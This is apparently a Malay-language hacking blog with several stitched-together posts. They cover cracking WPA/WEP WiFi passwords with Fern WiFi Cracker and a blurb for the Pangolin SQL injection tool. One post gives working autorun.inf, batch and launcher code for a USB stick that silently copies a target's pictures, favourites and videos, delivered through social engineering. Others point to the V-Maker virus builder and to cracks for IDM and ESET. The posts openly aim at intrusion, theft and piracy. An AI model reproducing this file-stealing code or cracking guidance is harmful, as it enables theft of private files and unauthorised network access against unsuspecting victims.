Seperti mana yang anda telah baca dalam entri Mr.Hac berkaitan The Google Hacking Database,anda sedia maklum bahawa Google ialah rakan terbaik bagi seorang penggodam untuk mencari kelemahan-kelemahan dan juga kata kunci sesebuah akaun.
Hari ini Analyzer nak berkongsi satu baris arahan yang mampu mendapatkan password dengan mudah secara rawak pada kotak carian Google.
Dalam tutorial kali ini Mr.Hac akan memberikan kepada anda kaedah atau cara pemasangan Fern WiFi Cracker pada Ubuntu. Ia perlu dipasang kerana ia bukanlah distro untuk menggodam seperti BackTrack 5. Senang faham tu kan? Hahah!
Benda yang diperlukan untuk pemasangan ialah:
1. Ubuntu-Linux (dah tentu la!) atau boleh juga gunakan Linux Mint (my current distro!)
2. python
3. python-qt4
4. macchanger
5. aircrack-ng
6. xterm
7. subversion
Dah ada Ubuntu atau Linux Mint? Ok bagus. Apa yang perlu anda lakukan ialah memasang satu demi satu perisian di atas melalui Ubuntu Software Center (USC) dan kalau Linux Mint anda boleh gunakan Software Manager (fungsinya sama macam USC). Caranya ialah dengan menaip pada kotak carian USC dan klik pada Install.
2. Dwiklik padanya dan USC akan muncul. Klik pada butang Install. Nanti akan keluar satu tetingkap amaran mengatakan tentang ‘Bad Quality’ (Lebih kurang la. Mr.Hac dah lupa). Abaikan dan klik pada ‘Ignore and Install’.
3. Kemudian setelah selesai pemasangan, jangan hairan jika butang Install tidak digantikan dengan ‘Remove’. Mr.Hac rasa ini ada kaitan dengan ‘Bad Quality’ itu tadi. Abaikan.
Anda boleh temui Fern WiFi Cracker pada Applications -> Other -> Fern WiFi Cracker. TETAPI!!
Anda tidak boleh terus klik di situ kerana ia memerlukan anda untuk menjalankannya sebagai Root. Bagi mereka yang belum tahu, Root bolehlah disamakan dengan Administrator pada sistem operasi Windows.
Jadi, sila buka Terminal, salin (Ctrl+c) dan tampal (Shift+Ctrl+v) pada Terminal baris perintah di bawah lalu klik Enter, dan masukkan kata laluan apabila diminta:
Hari ini kita akan membincangkan topik yang menjadi permintaan hangat dikalangan pembaca My Hackers Are Here. Mr.Hac akan memberikan kepada anda tutorial cara atau kaedah untuk menggodam (hack) dan memecahkan (crack) kata laluan WPA/WEPWiFi dengan menggunakan sebuah tool khas untuk distro Linux iaitu Fern WiFi Cracker.
Tool ini telah didatangkan sekali dalam distro Linux yang paling ‘hangat’ digunakan untuk menggodam iaitu BackTrack 5. Malang sekali tool yang berguna ini tidak dicipta untuk Windows (sorry pengguna Windows!) oleh itu Mr.Hac menggalakkan anda untuk memasang secara dual boot dengan Windows distro Linux sama ada BackTrack 5 atau Ubuntu, atau boleh juga Linux Mint untuk menggunakannya. Tentang kaedah pemasangan Fern WiFi Cracker ini pada Ubuntu, itu Mr.Hac akan tulis kemudian dalam entri yang akan datang.
Ok? Dah cukup dengan intro tu? Mari kita telusuri kaedah ini bersama.
Kaedah/Cara Menggunakan Fern WiFi Cracker:
1. Klik pada butang Refresh untuk memuatkan antaramuka pemantau (monitor interface). Kemudian klik pada butang Scan untuk memulakan pengimbasan.
2. Apabila terdapat rangkaian WPA atau WEP dijumpai oleh Fern ini, maka akan kelihatan paparan seperti di bawah:
3. Jika anda memilih untuk menggodam WEP, paparan seperti di bawah (InsyaAllah) akan keluar:
4. Jika anda memilih untuk menggodam WPA pula, maka paparan seperti di bawah (InsyaAllah) akan keluar:
5. Kata laluan atau kekunci (keys) akan ditambahkan ke dalam pengkalan data (database) secara automatik selepas ia berjaya dipecahkan. Bagaimanapun, anda boleh menambahkan keys secara manual. Pengkalan data boleh dijejaki di /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db
6. Anda boleh menjejaki lokasi router WiFi dengan Mac Address menggunakan Geolocatory Tracker. Ia boleh dibuka melalui Toolbox -> Geolocatory Tracker
7. Dah tu tunggu apa lagi? Guna la WiFi tu! Haha!
SUMBER GAMBAR/ENTRI: Fern WiFi Cracker (Sila muat turun ia dari sini)
P/S: Jika anda nak salin (copy) gambar dari entri ini ambillah, sebab memang bukan Mr.Hac punya pun. Tapi jika anda nak salin entri ini, sila letakkan kredit yang sepatutnya ya. Penat der menulis. Mr.Hac masih ingat entri Kaedah Untuk Hack dan Crack Internet Download Manager Secara Manual dan ia adalah yang PERTAMA ditulis dalam BAHASA MELAYU oleh MR.HAC. And then suddenly it spread all over the internet claimed by lamers that the entry was written by them. Shame on you!
Dalam versi 5 ini, anda perlu salin dan tampal maklumat lesen ke dalam Notepad terlebih dahulu sebelum dapat memasukkannya ke dalam ruang pengaktifan Eset. Jadi anda boleh menggunakan pemasang dan perisian asli dari laman web pembangunnya tanpa menggunakan crack! Ia lebih selamat dan yang paling penting ia asli!
Lama dah tak buat entri. Projek baru pon dah mula, jadi makin kurang la masa janjang untuk cari bahan dan buat entri kat sini. Sori yer Mr. Hac. tapi Janjang akan cuba luangkan masa untuk kongsi dengan semua bila berkesempatan.
Sebenarnya Janjang tak pasti samada Mr Hac ade tak buat review yang lepas-lepas pasal tool ni. kalau takde, ni ade tools untuk Script-Kiddies. Yang best nyer banyak jenis database yang tool ni boleh injek, bukan setakat SQL jer.
Terus terang Janjang cakap yang Janjang sendiri tak cuba lagi tool ni. ape kate korang cuba dan bagi review sket, ok tak ?
Malas nak translate, kalau korang tak paham tengok google atau kamus yer. Lagipon Guide dia dalam English gak.
Pangolin is an automatic SQL
injection penetration testing (Pen-testing) tool for Website manager or IT
Security analyst. Its goal is to detect and take advantage of SQL injection
vulnerabilities on web applications. Once it detects one or more SQL
injections on the target host, the user can choose among a variety of
options to perform an extensive back-end database management system
fingerprint, retrieve DBMS session user and database, enumerate users, password
hashes, privileges, databases, dump entire or users specific DBMS
tables/columns, run his own SQL statement, read specific files on the file
system and more.
Test many types of databases
Your web applications using Access,DB2,Informix,Microsoft SQL Server
2000,Microsoft SQL Server 2005,Microsoft SQL Server
2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.
Pangolin supports all of them.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass
firewall setting, Injection Digger, Data dumper, etc.
Matlamat anda kali ini ialah anda mahu mengambil secara senyap fail sulit dari PC sasaran anda. Namun bagaimana cara melakukannya? Alat yang perlu ada kali ini cuma pemacu kilat (flash drive @ USB pendrive) dan sedikit teknik kejuruteraan sosial (Social Engineering)
Mr.Hac akan cuba sedaya upaya untuk memberikan penerangan terperinci akan langkah-langkah yang perlu anda lakukan untuk menjayakan tutorial kali ini. Kaedah ini adalah lebih kurang sama dengan tutorial Mr.Hac yang terdahulu iaitu -> Bagaimana Cara Mendapatkan Kata Laluan Yang Tersimpan Dalam Komputer?
Lihat gambar di atas. Anda perlu mencipta 4 fail untuk menjayakan tutorial ini. Mari kita ikuti langkah-langkah yang tersebut di bawah:
1. Langkah pertama, buka Notepad dan salin kod berikut dan simpan sebagai (save as) autorun.inf (bagi pengguna Ubuntu, boleh buka Notepad dalam perisian Wine. Sila pasang Wine terlebih dahulu):
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shellopencommand=launch.bat
Baris kod untuk icon adalah terletak pada pilihan anda. Anda boleh gunakannya atau biar icon lalai (default) sahaja yang digunakan.
2. Buka Notepad lalu salin dan tampal baris kod di bawah dan simpan sebagai file.bat
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%pictures” “%drive%allMy pics”
%backupcmd% “%USERPROFILE%favorites” “%drive%allFavorites”
%backupcmd% “%USERPROFILE%videos” “%drive%allvids”
@echo off
cls
Kita memerlukan fail ini untuk menyalin fail yang dikehendaki dalam folder ‘pictures’, ‘favourites’ dan ‘videos’ kepada pemacu kilat ke dalam folder yang kita cipta dengan nama ‘all’.
Untuk lebih faham, lihat carta alir di bawah:
%USERPROFILE%pictures <— ini ialah folder sasaran
%drive%allMy pics <— ini ialah folder destinasi tempat fail sulit itu akan disalin
3. Buka Notepad, salin dan tampal kod di bawah lalu simpan sebagai invisible.vbs
Baris kod ini akan menjalankan fail file.bat itu tadi sebagai satu proses jadi tampilan CMD akan ‘disembunyikan di sebalik tabir’. Maknanya buat kerja curi tu senyap-senyap la! Haha!
4. Orait. Final step. Buka Notepad, salin dan tampal baris kod di bawah sebagai launch.bat
wscript.exe invisible.vbs file.bat
Ok. Fail launch.bat ini akan mencari fail invisible.vs lalu menjalankan ia bersama dengan file.bat, dengan erti kata file.bat menjalankan kod dari fail invisible.vbs
5. Salin kesemua fail ini ke dalam pemacu kilat anda, cipta satu folder dengan nama ‘all’, dan sorok (hide) kesemua fail ini (klik kanan, tandakan pada ‘Hidden’). Salin juga fail icon (.ico) jika diperlukan (jika anda letakkan ia sekali dalam tetapan baris kod di atas)
Langkah terakhir? Apa lagi! Pergi kepada sasaran dan tawarkan kepadanya sesuatu yang berharga dalam pemacu kilat anda seperti lagu, video dan lain-lain. Apabila anda masukkan saja pemacu kilat ke dalam port USB komputer sasaran, maka biarkan sahaja fail-fail di atas menjalankan kerjanya! Menarik bukan?
Ini memang permainan untuk Script Kiddies. Jadi para ‘master’ yang masuk ke blog ini bolehlah dipersilakan lihat sahaja. Tak perlu komen, ya?
Virus Creator/Virus Builder ini memang dah lama. Oleh itu maklumat mengenainya boleh dikatakan ada dalam setiap database antivirus yang sudah dikemaskini. Jadi jangan hairan sekiranya antivirus anda menjerit-jerit mengatakan ia adalah virus.
Mr.Hac tidak mahu membuat tutorial untuk tool ini. Cukup sekadar Mr.Hac memberikan pautan untuk muat turun dan anda boleh ‘godek’ sendiri (Analyzer mesti suka ni). Tool ini diberi nama Virus Matic 2010 atau nama singkatannya V-Maker. Pelbagai ciri-ciri virus yang dikehendaki boleh dicipta melalui tool kecil ini. Antaranya seperti mematikan fungsi mouse dan keyboard, memadam folder system32, menyekat laman web, penyebaran melalui USB (not FUD ok) dan lain-lain lagi.
Rasanya dah lama Mr.Hac tak kemaskini versi IDM yang ada dalam PC. Versi terakhir yang Mr.Hac gunakan sebelum mengemaskini kepada versi terbaharu ialah 6.07 Build 7. Sekarang IDM sudah masuk versi 6.07 Build 11. Memang banyak pembaharuan yang dibuat meskipun ia tidak dapat dilihat pada paparan antaramukanya.
Quote dari laman web IDM:
What’s new in version 6.07 build 11?
(Released: Sep 15, 2011)
Added video stream recognition for several new web players
Fxied a critical bug in 64bit versions of Windows
What’s new in version 6.07 build 10?
(Released: Sep 08, 2011)
Resolved the problem with expiration of download links on youtube. Fixed automatic updating of download addresses
Added digest authentication for proxy authorization
Added rtmp resume for many sites where IDM could not resume in the past
Improved downloading for the sites which generate temporary download links
What’s new in version 6.07 build 9?
(Released: Aug 29, 2011)
Added support for Firefox 7
Fixed bugs
Anda boleh muat turun IDM dengan versi 6.07 Build 11 pada pautan di bawah:
Dalam folder yang telah Mr.Hac muat naik itu terdapat juga versi mudah alih (portable). Terdapat SND Patch yang telah dikemaskini untuk membuat IDM anda crack tanpa sebarang masalah. Oleh itu tidak perlu bimbang, tidak akan ada ralat ‘fake serial number’. Ok aaa.. Jangan lupa klik plusone tu!